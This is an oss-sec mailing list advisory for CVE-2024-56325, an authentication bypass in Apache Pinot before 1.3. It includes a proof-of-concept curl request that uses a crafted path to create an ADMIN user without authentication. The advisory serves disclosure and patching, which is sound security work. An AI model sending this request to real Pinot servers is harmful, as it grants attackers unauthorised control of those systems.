oss-sec mailing list archives

Previous By Date Next
Previous By Thread Next

CVE-2024-56325: Apache Pinot: Authentication bypass issue. If the path does not contain / and contain . authentication is not required

From: siddharth teotia <siddharthteotia () gmail com>
Date: Thu, 27 Mar 2025 04:34:29 -0700
*Severity:* critical
*Affected versions:*

- Apache Pinot before 1.3
*Description:*

Authentication Bypass Issue

If the path does not contain / and contain., authentication is not required.
*Expected Normal Request and Response Example*

curl -X POST -H "Content-Type: application/json" -d
{\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}
 http://{server_ip}:9000/users

Return: {"code":401,"error":"HTTP 401 Unauthorized"}
*Malicious Request and Response Example*

curl -X POST -H "Content-Type: application/json" -d
'{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}'
 http://{serverip}:9000/users; http://{serverip}:9000/users; .

Return: {"users":{}}

A new user gets added bypassing authentication, enabling the user to
control Pinot.

References:https://www.cve.org/CVERecord?id=CVE-2024-56325

Thanks

Siddharth (Apache Pinot PMC)
Previous By Date Next
Previous By Thread Next

Current thread: